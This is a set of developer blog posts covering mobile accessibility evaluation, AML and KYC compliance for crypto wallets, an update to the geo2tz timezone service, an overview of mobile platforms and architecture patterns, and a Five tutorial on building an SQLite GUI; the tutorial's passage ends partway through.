A PAGE TALKS ABOUT (The 2-Minute Guide: Making the Mobile Web & App Accessible)
MY WORKOUTS: PICTURE THIS The Accessibility Landscape encompasses Design, Development,...
0
2024-06-30T23:27:45
https://dev.to/rewirebyautomation/a-page-talks-about-the-2-minute-guide-making-the-mobile-web-app-accessible-1gdi
testing, a11y, automation, webdev
> **_MY WORKOUTS: PICTURE THIS_** ![Rewire Channel](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3dctj1yxto1c2jzokqga.png) ![reWireChannel Objectives](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rv2slhbzwn0cfww8c0hp.png) > The Accessibility Landscape encompasses _**Design, Development, Authoring, Evaluation, and Accessibility Standards & Guidelines**_ to ensure Mobile Content is accessible through sophisticated services to all users, including those with disabilities. ![ACCESSIBILITY LANDSCAPE](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kemrrejgiz4m8f912kym.png) > Consider the story mentioned as a pre-requisite in the preceding post, which is an integral part of the **_Program Preview._** ![Program Preview](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/84b65hwurmy31jt7607d.png) > A PAGE TALKS ABOUT column from the **_@reWireByAutomation_** channel, which has published a short introduction to **_‘The Glimpse, Accessibility evaluation”_**. If you haven’t read it yet, please navigate to this story first. I recommend reading the introductory story as a prerequisite before scanning below. It will help you to benefit from and establish connectivity throughout this journey. ![ACCESSIBILITY PROGRAM](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y4lougfveyk49gf0j7z7.png) > A PAGE TALKS ABOUT column from the **_@reWireByAutomation_** channel, which has published a short introduction to **_‘The Glimpse, Accessibility evaluation” and “WCAG — Framework View”, “Approach & Methods” _** as a follow-up session. If you haven’t read it yet, please navigate to these stories first. I recommend reading the introductory story and subsequent session as a prerequisite before scanning below. It will help you to benefit from and establish connectivity throughout this journey. ![PUBLISHED STORIES ON ACCESSIBILITY](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yjt8axzgeo0cqupbyh2a.png) {% embed https://dev.to/rewirebyautomation/a-page-talks-about-the-glimpse-accessibility-evaluation-dp %} {% embed https://dev.to/rewirebyautomation/a-page-talks-about-wcag-framework-view-53b2 %} {% embed https://dev.to/rewirebyautomation/a-page-talks-about-the-2-minute-guide-accessibility-evaluation-approach-methods-and-tools-2km %} > This aims to outline the **_‘Approach’ _**to start the journey with **_“Mobile Solutions Overview: Making the Mobile Web & App Accessible”_** ![Approach](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i8iwr01ult7dkqls5oim.png) > Refer to the mind map below titled **_‘Picture This: Program’_** which serves as a starting point for the journey towards **_“Making the Mobile Web & App Accessible”._** ![Program](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6hnirmjbgr3wswit08rm.png) This approach is defined in the format of a **_‘Top-Down Approach’_** that starts from ‘Enterprise’ to ‘Strategy’ and concludes with ‘Build.’ The core objective is to bring the ‘Business Objectives’ into the ‘Enterprise’ direction to form objectives that support products and further strategize the objectives to achieve business goals as per enterprise needs. It is driven by the support of building necessary processes, standards, and guidelines to achieve product accessibility. > Refer to the mind map below titled **_‘Picture This: Approach at Enterprise’ _**which serves as a starting point for the journey towards “Accessibility Evaluation for Mobile Apps world”. ![APPROACH — ENTERPRISE](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gjvv9ddcc8cejxrj0wov.png) > Refer to the mind map below, which organizes the principles to encompass the four fundamental elements of accessibility: **_Perceivable, Operable, Understandable and Robust. _** It also includes techniques associated with each principle that covers Mobile Web & Apps accessibility evaluation. Techniques are categorized under 3 categories (**Sufficient:** defines must satisfy guidelines check, **Advisory:** defines guidelines improvement and beyond, **Failure:** defines causes of failure of checks specific to Mobile Apps. ![Mobile at WCAG](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pp4ckl8r1x26gctie8ip.png) > Refer to the mind map provided below, entitled **_‘Picture This: Mobile Platforms’_**, which describes the platforms that are available to conduct the “Mobile Web and Apps Accessibility” Evaluation. ![Mobile Platforms](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tedg5ne4aacr1f1k6kj6.png) > Refer to the mind map provided below, entitled **_‘Picture This: Approach @Methodology’_** which is a critical element for understanding the Methodology that integrates with Product Development Methodology. ![APPROACH — METHODOLOGY](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/atrxgpz5tmig5nk415mw.png) > Refer to the mind map provided below, entitled **_‘Picture This: Methods @Evaluation’_** which outlines the scope of methods, targets analysis on the App objects, and corresponding entity checks. ![METHODS — EVALUATION](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kxqzw34ds48tex3jzylw.png) > Refer to the mind map provided below, entitled **_‘Picture This: Solutions Overview — Mobile Cloud Solutions’_** which outlines the components of Mobile Web & App Accessibility evaluation from a Mobile Cloud Solutions perspective. It indicates the leverage of Android and iOS analyzers and screen readers. The Axe Dev Tools overview encompasses Axe Dev Tools analyzers and native libraries developed in multiple languages, powered by XCUITest, Espresso, and Appium in the form of plugins. It integrates with Mobile Cloud platforms to conduct Mobile Web and App accessibility in an automated fashion. ![Mobile Cloud Solutions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m5yvoynnekjiyar6ynxi.png) > **_The Conclusion: Picture This_** ![THE CONCLUSION](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/citbflg5rahflmej03pd.png) > **_Refer to the voiceover session below from the @reWireByAutomation YouTube channel._** {% embed https://youtu.be/ZfXFRhpeZqk %} > As part of the upcoming stories, I will continue to publish advancements in Accessibility Evaluation technologies which are designed to offer valuable insights into **AI-Powered solutions**. This is @reWireByAutomation, signing off!
rewirebyautomation
1,906,981
AML Policies in Blockchain
Anti-Money Laundering (AML) policies play a crucial role in preventing illicit activities such as...
0
2024-06-30T23:13:12
https://dev.to/bitpowr/aml-policies-in-blockchain-doe
Anti-Money Laundering (AML) policies play a crucial role in preventing illicit activities such as money laundering and terrorist financing within the blockchain space. However, many crypto companies, especially startups, think that the costs and complexity of implementing full AML/KYC measures are too high. In this article, we will look at what AML and KYC mean for crypto exchanges and wallets, and how automated KYC solutions can make this process easier and more efficient. ### What is AML? It refers to a set of laws, regulations, and procedures designed to prevent criminals from disguising illegally obtained funds as legitimate income. AML measures are used by financial institutions and other regulated entities to detect and report suspicious activities related to money laundering, ensuring compliance with regulatory standards to help prevent financial crimes. AML regulations are implemented by a wide range of international and national regulatory agencies. These regulations require financial institutions to identify, monitor, and report suspicious transactions to relevant authorities. ## Some Components of AML ### Know Your Customer (**KYC)** What is KYC? Also known as Customer Due Diligence (CDD), KYC is the process of verifying the identity and background information of customers. When the customer is a business, this process is called KYB, or Know Your Business. KYC/KYB is a crucial part of Anti-Money Laundering (AML) efforts, helping financial institutions identify potential risks and prevent their platforms, services, and networks from being used for illegal activities. KYC procedures involve collecting information such as a customer’s name, date of birth, address, and source of income. This data is used to verify the customer's identity and assess their risk profile. ### Counter-Terrorist Financing (CTF) Counter-Terrorist Financing (CTF) is a set of measures and regulations put in place to prevent terrorist groups from using financial systems to support their operations. It is a critical component of efforts to combat terrorism and prevent its funding through financial systems Financial institutions play a crucial role in CTF, as they are required to implement a range of controls and procedures to detect and prevent terrorist financing CTF measures include customer due diligence, transaction monitoring, and reporting suspicious activity to relevant authorities ### A global Look at Crypto Regulatory Bodies for AML Compliance The regulatory landscape for Anti-Money Laundering (AML) compliance in the cryptocurrency space is complex and evolving globally. There isn't a single, unified body for crypto regulations. Instead, AML compliance for cryptocurrency is overseen by a mix of international and regional organizations, along with individual nation-state regulators. Here's a breakdown by region: **Global:** - [**Financial Action Task Force (FATF)**](https://www.fatf-gafi.org/en/topics/virtual-assets.html) The Financial Action Task Force (FATF) is an international organization that sets standards and promotes policies to combat money laundering, terrorist financing, and the financing of weapons of mass destruction proliferation. Their guidance on cryptocurrencies, issued in 2019, is a foundation for regulations worldwide. **US:** - [**Financial Crimes Enforcement Network**](https://www.fincen.gov/) (FinCEN):A bureau of the US Department of Treasury, FinCEN issues guidance and enforces AML regulations for cryptocurrency businesses [What Is Anti-Money Laundering (AML) & How Does It Apply to Crypto?]. - [**Securities and Exchange Commission**](https://www.sec.gov/) (SEC):Regulates the offer and sale of securities, including some Initial Coin Offerings (ICOs) that might be considered securities. **Asia:** - [**Japan Financial Services Agency**](https://www.fsa.go.jp/en/) (JFSA): Oversees AML compliance for crypto exchanges in Japan. - [**Monetary Authority of Singapore**](https://www.mas.gov.sg/) (MAS): Actively involved in strengthening AML measures for cryptocurrency exchanges in Singapore, intensifying interactions with the industry to improve compliance and monitoring mechanisms. **Africa:** While no continent-wide body exists, individual African nations are developing their own crypto regulations eg. - [**Intergovernmental Action Group against Money Laundering in Eastern and Southern Africa**](https://www.esaamlg.org/index.php) (GIABA): A FATF-style regional organization issuing AML guidance for its member states. **Europe:** - [**European Commission**](https://commission.europa.eu/index_en):Proposes EU-wide regulations, including AML frameworks for cryptocurrencies. - [**Fifth Anti-Money Laundering Directive**](https://risk.lexisnexis.co.uk/insights-resources/infographic/5th-money-laundering-directive) (AMLD5): An EU directive requiring member states to implement AML rules for cryptocurrency businesses. This is not an exhaustive list, and regulations are constantly evolving. It's crucial to stay updated on the specific requirements for the jurisdictions you're interested in. ### **What Happens When AML Policies Are Not Followed?** Failure to comply with AML regulations can result in severe penalties for financial institutions, including hefty fines, license suspensions, and even criminal prosecution of executives. Non-compliance can also lead to significant reputational damage and loss of public trust. To mitigate these risks, financial institutions must implement robust AML compliance programs tailored to their specific risks and regulatory requirements. This often involves investing in specialized compliance expertise, advanced transaction monitoring systems, and ongoing employee training. By adhering to AML regulations, financial institutions play a crucial role in preserving the integrity of the global financial system and preventing the misuse of the financial system for illicit purposes. ### **The Importance of AML Policies in Blockchain Wallets** AML policies are critical in the blockchain space due to the inherent anonymity of cryptocurrency transactions. The lack of identification and verification checks on the source and destination of funds, combined with the absence of historical records of transactions, creates a genuine risk of fraud. Complying with AML regulations can mitigate money laundering and terrorist financing risks, thereby stabilizing the crypto market and building trust among users. ### **Bitpowr's Approach to AML Compliance** At Bitpowr, we recognize the importance of AML policies in maintaining the integrity of transactions. To ensure compliance with regulatory standards, Bitpowr employs a robust AML framework that includes the following measures: 1. **Know Your Customer (KYC) Procedures:** Bitpowr verifies the identity of its users through a comprehensive KYC process, which includes the collection of customer data and the checking of its accuracy. This ensures that all transactions are traceable and compliant with regulatory requirements. 2. **Transaction Monitoring:** Bitpowr continuously monitors transactions for suspicious activity, utilizing advanced algorithms to detect and flag potential money laundering schemes. 3. **Reporting and Compliance:** Bitpowr maintains a detailed record of all transactions and reports any suspicious activity to relevant authorities, ensuring that regulatory requirements are met and that the integrity of transactions is maintained. 4. **Partnerships and Collaborations:** Bitpowr partners with leading AML compliance solutions like Thoropass to stay updated on the latest regulatory requirements and to ensure that its AML framework remains effective in preventing illicit activities. 5. **Others**: We use OFAC database to also monitor our transaction addresses and to confirm addresses that has been reported on OFAC. We’re also integrating with merkle science and other compliance agents to fully ensure our system is well compliant. ### In Conclusion AML policies are essential in maintaining the integrity of transactions within the blockchain space. Bitpowr's commitment to AML compliance ensures that its users can transact with confidence, knowing that their transactions are secure and compliant with regulatory standards. As the blockchain industry continues to evolve, it is crucial that wallet providers prioritize AML policies to prevent illicit activities and maintain the trust of users.
bitpowr
1,906,979
geo2tz - 4 years later
tl;dr after 4y, the projects have been substantially updated and it is now well-tested and...
0
2024-06-30T23:12:00
https://dev.to/noandrea/geo2tz-4-years-later-61f
timezone, go, rest
**tl;dr** after 4y, the projects have been substantially updated and it is now well-tested and mature. In July 2020, I [wrote on this platform]( https://dev.to/noandrea/ready-self-hosted-geo-to-timezone-service-1ee0) about [geo2tz](https://github.com/noandrea/geo2tz), a rest API to retrieve the timezone from latitude and longitude coordinates. I have sporadically updated the project from time to time, and now, four years later, something has happened that moved me to give it some love and make sure it is up to date, this led to a complete rewrite of the engine that powers it, and this post is about what are the reasons and what are the results of this rewrite. When I published the project in 2020, I was working on another project, and I needed something like geo2tz, but I could not find anything that fit my requirements, so I decided to create it by putting together a web framework, the timezone data and a library that was providing the logic to process and query the timezones GeoJson, and that was it. Fast forward to the beginning of 2023, I get an [issue open](LINK https://github.com/noandrea/geo2tz/issues/22) of a person complaining about a set of coordinates missing, but it looked like it was a dataset issue, so there was nothing much to do. But at the beginning of 2024, someone pointed out that the service was not working properly for other coordinates. Clearly, something was afoul, and since there were people who took the time to comment, I took it more seriously to check what was going on. What I found out is that the issues were coming from the library that I was using to manage the timezone data, the library stopped being updated and was actually returning incorrect results. I took my sweet time to do it, not gonna lie, but eventually, I rewrote the GeoJSON parser, re-engineered the index and algorithm to match the timezone from coordinates, and added a lot of tests to make sure that geo2tz behaves correctly and here we have, a new shiny version ([2.4.0](https://github.com/noandrea/geo2tz/releases/tag/v2.4.0)) that is ready to put to use!
noandrea
1,906,978
Exploring Mobile Development Platforms and Software Architecture Patterns
Introduction Hello, everyone! My name is karabo John Malebati.i am an aspiring mobile developer and...
0
2024-06-30T23:02:20
https://dev.to/john_karabo_e43c035a14c26/exploring-mobile-development-platforms-and-software-architecture-patterns-5365
Introduction Hello, everyone! My name is karabo John Malebati.i am an aspiring mobile developer and i am thrilled to announce that i am embarking on a new thrilling journey of mobile web development with the good people at the HNG Internship https://hng.tech/internship. In this blog post, I will explore various mobile development platforms and common software architecture patterns, shedding light on their pros and cons. Additionally, I will share a bit about myself and my goals for this internship. Mobile Development Platforms 1. Android Android, developed by Google, is one of the most popular mobile development platforms. It boasts a large user base and a vast array of devices, offering developers a broad audience. Android Studio is the official IDE, providing robust tools for app development. Pros: Open-source and customizable. Extensive community support and resources. Access to a wide range of devices and users. Cons: Fragmentation issues due to the variety of devices and OS versions. Higher testing complexity. 2. iOS iOS, developed by Apple, is known for its high performance and seamless user experience. Using Xcode as the official IDE and Swift as the primary programming language, iOS development focuses on quality and consistency. Pros: High performance and security. Consistent user experience across devices. Access to a lucrative user base with higher app monetization potential. Cons: Closed ecosystem with strict guidelines. Requires a Mac for development. 3. Flutter Flutter, developed by Google, is an open-source UI toolkit for building natively compiled applications for mobile, web, and desktop from a single codebase. It uses the Dart programming language. Pros: Single codebase for multiple platforms. Fast development with hot reload. Rich set of pre-designed widgets. Cons: Relatively new, with a smaller community. Larger app size. 4. React Native React Native, developed by Facebook, allows developers to build mobile apps using JavaScript and React. It offers a balance between performance and development speed, enabling code reuse across platforms. Pros: Code reuse between iOS and Android. Strong community support. Faster development cycle. Cons: Performance lag compared to native apps. Limited access to native APIs. Software Architecture Patterns 1. Model-View-Controller MVC is a widely used design pattern that separates the application into three interconnected components: Model, View, and Controller. Pros: Clear separation of concerns. Simplifies testing and maintenance. Facilitates parallel development. Cons: Can become complex with large applications. Tight coupling between components. 2. Model-View-Presenter MVP is a derivative of MVC that focuses on improving the separation of concerns by introducing a Presenter component to handle the presentation logic. Pros: Better separation of concerns compared to MVC. Easier to test presentation logic. Reduces the complexity of the View component. Cons: Increased code complexity. Overhead of maintaining the Presenter. 3. Model-View-View Model MVVM enhances separation of concerns by adding a View Model that binds the View and the Model, facilitating data binding and reducing boilerplate code. Pros: Clear separation of concerns. Facilitates data binding and reduces boilerplate. Easier to unit test. Cons: Can be overkill for simple applications. Learning curve for data binding techniques. 4. Clean Architecture Clean Architecture, proposed by Robert C. Martin, emphasizes separation of concerns, maintainability, and testability by organizing code into layers. Pros: Highly maintainable and scalable. Facilitates independent testing. Promotes best practices and code quality. Cons: Steeper learning curve. Increased initial development effort. My Journey with HNG Internship Starting the HNG Internship marks a significant milestone in my journey as a mobile developer. I am eager to learn from industry experts, work on real-world projects, and collaborate with talented peers. The hands-on experience and mentorship provided by HNG will be invaluable as I strive to become a world-class developer. I chose the HNG Internship because it offers a unique blend of practical experience and professional growth. The program’s emphasis on learning from the best in the industry aligns perfectly with my goal of mastering mobile development and creating impactful applications. If you are interested in learning more about the HNG Internship, check out HNG Internship https://hng.tech/internshiphttps://hng.tech/internship and HNG Premium https://hng.tech/premium for more information. Thank you for reading, and I look forward to sharing more of my experiences and insights in the future!
john_karabo_e43c035a14c26
1,906,977
How to Build an SQLite GUI (Fast & Easy Tutorial)
How to Build an SQLite GUI: 4 Steps Only In this guide, we will walk through the four essential...
0
2024-06-30T23:00:42
https://five.co/blog/how-to-build-an-sqlite-gui/
sql, gui, tutorial, beginners
<!-- wp:heading --> <h2 class="wp-block-heading">How to Build an SQLite GUI: 4 Steps Only</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>In this guide, we will walk through the four essential steps to create an <a href="https://www.sqlite.org/">SQLite</a> GUI. These steps include:</p> <!-- /wp:paragraph --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Creating a new application with Five.</strong></li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Connecting to an SQLite database with Five.</strong><br>Five can connect to your existing SQLite database. Just provide a connection string, and Five will enable you to create a <a href="https://five.co/blog/how-to-create-a-database-front-end/">web front-end</a>. Note that this requires a paid subscription to Five.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Creating forms.</strong><br>We will focus on building forms that allow end-users to perform <a href="https://five.co/blog/how-to-build-a-crud-app/">CRUD</a> (Create, Read, Update, Delete) operations on the data in our SQLite database.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Launching the application.</strong><br>Deploy the application locally for free using Five's free download.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:paragraph --> <p>By the end, you'll have a responsive GUI for end-users to interact with your SQLite database.</p> <!-- /wp:paragraph --> <!-- wp:essential-blocks/table-of-contents {"blockId":"eb-toc-tmg4m","blockMeta":{"desktop":".eb-toc-tmg4m.eb-toc-container { max-width:610px; background-color:var(\u002d\u002deb-global-background-color); padding:30px; border-radius:4px; transition:all 0.5s, border 0.5s, border-radius 0.5s, box-shadow 0.5s }.eb-toc-tmg4m.eb-toc-container .eb-toc-title { text-align:center; cursor:default; color:rgba(255,255,255,1); background-color:rgba(69,136,216,1); font-size:22px; font-weight:normal }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper { background-color:rgba(241,235,218,1); text-align:left }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li { color:rgba(0,21,36,1); font-size:14px; line-height:1.4em; font-weight:normal }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li:hover,.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li.eb-toc-active \u003e a { color:var(\u002d\u002deb-global-link-color) }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li a { color:inherit }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li svg path { stroke:rgba(0,21,36,1) }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li:hover svg path { stroke:var(\u002d\u002deb-global-link-color) }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li a,.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li a:focus { text-decoration:none; background:none }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li { padding-top:4px }.eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper .eb-toc__list li:not(:last-child) { padding-bottom:4px }.eb-toc-tmg4m.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list { background:#fff; border-radius:4px }","tab":"","mobile":"","editorDesktop":"\n\t\t \n\t\t \n\n\t\t .eb-toc-tmg4m.eb-toc-container{\n\t\t\t max-width:610px;\n\n\t\t\t background-color:var(\u002d\u002deb-global-background-color);\n\n\t\t\t \n \n\n \n\t\t\t \n padding: 30px;\n\n \n\t\t\t \n \n \n \n\n \n \n border-radius: 4px;\n\n \n \n\n \n\n\n \n\t\t\t transition:all 0.5s, \n border 0.5s, border-radius 0.5s, box-shadow 0.5s\n ;\n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container:hover{\n\t\t\t \n \n \n\n\n \n\n \n \n \n\n \n \n\n \n\n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-title{\n\t\t\t text-align: center;\n\t\t\t cursor:default;\n\t\t\t color: rgba(255,255,255,1);\n\t\t\t background-color:rgba(69,136,216,1);\n\t\t\t \n\t\t\t \n \n\n \n\t\t\t \n \n font-size: 22px;\n \n font-weight: normal;\n \n \n \n \n \n\n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper{\n\t\t\t background-color:rgba(241,235,218,1);\n\t\t\t text-align: left;\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper ul,\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper ol\n\t\t {\n\t\t\t \n\t\t\t \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li {\n\t\t\t color:rgba(0,21,36,1);\n\t\t\t \n \n font-size: 14px;\n line-height: 1.4em;\n font-weight: normal;\n \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li:hover,\n .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li.eb-toc-active \u003e a{\n\t\t\t color:var(\u002d\u002deb-global-link-color);\n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li a {\n\t\t\t color:inherit;\n\t\t }\n\n .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li svg path{\n stroke:rgba(0,21,36,1);\n }\n .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li:hover svg path{\n stroke:var(\u002d\u002deb-global-link-color);\n }\n\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li a,\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li a:focus{\n\t\t\t text-decoration:none;\n\t\t\t background:none;\n\t\t }\n\n\t\t \n\n .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li {\n padding-top: 4px;\n }\n\n .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper .eb-toc__list li:not(:last-child) {\n padding-bottom: 4px;\n }\n\n \n .eb-toc-tmg4m.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n background: #fff;\n \n \n \n \n\n \n \n border-radius: 4px;\n\n \n \n\n \n\n\n \n }\n\n\n\t \n\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper{\n\t\t\t display:block;\n\t\t }\n\t\t ","editorTab":"\n\t\t \n\t\t .eb-toc-tmg4m.eb-toc-container{\n\t\t\t \n\n\t\t\t \n \n\n \n\t\t\t \n \n\n \n\t\t\t \n \n \n\n \n\n \n \n \n\n \n \n\n \n\t\t }\n\t\t .eb-toc-tmg4m.eb-toc-container:hover{\n\t\t\t \n \n \n \n \n \n \n\n \n \n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-title{\n\t\t\t \n \n\n \n\t\t\t \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper{\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li{\n\t\t\t \n \n \n \n \n\t\t }\n\n .eb-toc-tmg4m.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n \n \n \n\n \n\n \n \n \n\n \n \n\n \n }\n\n\t \n\t\t ","editorMobile":"\n\t\t \n\t\t .eb-toc-tmg4m.eb-toc-container{\n\t\t\t \n\n\n\t\t\t \n \n\n \n\t\t\t \n \n\n \n\t\t\t \n \n \n\n \n\n \n \n \n\n \n \n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container:hover{\n\t\t\t \n \n \n\n \n \n \n \n\n \n \n\n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-title{\n\t\t\t \n \n\n \n\t\t\t \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper{\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-tmg4m.eb-toc-container .eb-toc-wrapper li{\n\t\t\t \n \n \n \n \n\t\t }\n\n .eb-toc-tmg4m.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n \n \n \n\n \n\n \n \n \n\n \n \n \n }\n\n\t \n\t "},"headers":[{"level":2,"content":"How to Build an SQLite GUI: 4 Steps Only","text":"How to Build an SQLite GUI: 4 Steps Only","link":"how-to-build-an-sqlite-gui-4-steps-only"},{"level":2,"content":"Why Use Five to Create Your SQLite GUI?","text":"Why Use Five to Create Your SQLite GUI?","link":"why-use-five-to-create-your-sqlite-gui"},{"level":2,"content":"Features of SQLite GUI's Built with Five:","text":"Features of SQLite GUI's Built with Five:","link":"features-of-sqlite-guis-built-with-five"},{"level":3,"content":"Why Choose Five Over an Open-Source Software Stack?","text":"Why Choose Five Over an Open-Source Software Stack?","link":"why-choose-five-over-an-open-source-software-stack"},{"level":2,"content":"How to Create an SQLite GUI:","text":"How to Create an SQLite GUI:","link":"how-to-create-an-sqlite-gui"},{"level":3,"content":"Building a New Application With Five","text":"Building a New Application With Five","link":"building-a-new-application-with-five"},{"level":3,"content":"Creating a Database with Five","text":"Creating a Database with Five","link":"creating-a-database-with-five"},{"level":3,"content":"Creating Database Tables","text":"Creating Database Tables","link":"creating-database-tables"},{"level":3,"content":"Creating Forms with Five","text":"Creating Forms with Five","link":"creating-forms-with-five"},{"level":3,"content":"Launching Your Application","text":"Launching Your Application","link":"launching-your-application"},{"level":3,"content":"Understanding Five's User Interface","text":"Understanding Five's User Interface","link":"understanding-fives-user-interface"},{"level":3,"content":"Connecting Five To An Existing SQLite Database","text":"Connecting Five To An Existing SQLite Database","link":"connecting-five-to-an-existing-sqlite-database"},{"level":2,"content":"Conclusion \u0026 Next Steps: Build An SQLite GUI","text":"Conclusion \u0026 Next Steps: Build An SQLite GUI","link":"conclusion-next-steps-build-an-sqlite-gui"}],"deleteHeaderList":[{"label":"How to Build an SQLite GUI: 4 Steps Only","value":"how-to-build-an-sqlite-gui-4-steps-only","isDelete":false},{"label":"Why Use Five to Create Your SQLite GUI?","value":"why-use-five-to-create-your-sqlite-gui","isDelete":false},{"label":"Features of SQLite GUI's Built with Five:","value":"features-of-sqlite-guis-built-with-five","isDelete":false},{"label":"Why Choose Five Over an Open-Source Software Stack?","value":"why-choose-five-over-an-open-source-software-stack","isDelete":false},{"label":"How to Create an SQLite GUI:","value":"how-to-create-an-sqlite-gui","isDelete":false},{"label":"Building a New Application With Five","value":"building-a-new-application-with-five","isDelete":false},{"label":"Creating a Database with Five","value":"creating-a-database-with-five","isDelete":false},{"label":"Creating Database Tables","value":"creating-database-tables","isDelete":false},{"label":"Creating Forms with Five","value":"creating-forms-with-five","isDelete":false},{"label":"Launching Your Application","value":"launching-your-application","isDelete":false},{"label":"Understanding Five's User Interface","value":"understanding-fives-user-interface","isDelete":false},{"label":"Connecting Five To An Existing SQLite Database","value":"connecting-five-to-an-existing-sqlite-database","isDelete":false},{"label":"Conclusion \u0026 Next Steps: Build An SQLite GUI","value":"conclusion-next-steps-build-an-sqlite-gui","isDelete":false}],"isMigrated":true,"titleBg":"rgba(69,136,216,1)","titleColor":"rgba(255,255,255,1)","contentBg":"rgba(241,235,218,1)","contentColor":"rgba(0,21,36,1)","contentGap":8,"titleAlign":"center","titleFontSize":22,"titleFontWeight":"normal","titleLineHeightUnit":"px","contentFontWeight":"normal","contentLineHeight":1.4,"ttlP_isLinked":true,"commonStyles":{"desktop":".wp-admin .eb-parent-eb-toc-tmg4m { display:block }.wp-admin .eb-parent-eb-toc-tmg4m { filter:unset }.wp-admin .eb-parent-eb-toc-tmg4m::before { content:none }.eb-parent-eb-toc-tmg4m { display:block }.root-eb-toc-tmg4m { position:relative }","tab":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-tmg4m { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-tmg4m { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-tmg4m::before { content:none }.eb-parent-eb-toc-tmg4m { display:block }","mobile":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-tmg4m { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-tmg4m { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-tmg4m::before { content:none }.eb-parent-eb-toc-tmg4m { display:block }"}} /--> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Why Use Five to Create Your SQLite GUI?</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five is a rapid application builder designed to accelerate the creation and deployment of custom web applications. It offers developers pre-built components that can be combined with custom code as needed.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>The Five development environment supports the entire application development process, from data modeling to deployment. It's perfect for building business applications for internal or external users.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>Applications built with Five range from internal tools and departmental applications to operations software, business partner portals, and B2B applications. Examples include custom CRM solutions, membership systems, order management systems (OMS), product information management systems (PIM), and inventory systems. Check out our <a href="https://five.co/use-cases/">use cases</a> for application templates and inspiration.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Features of SQLite GUI's Built with Five:</h2> <!-- /wp:heading --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Database Integration</strong>: Utilize Five's built-in MySQL database or connect to <a 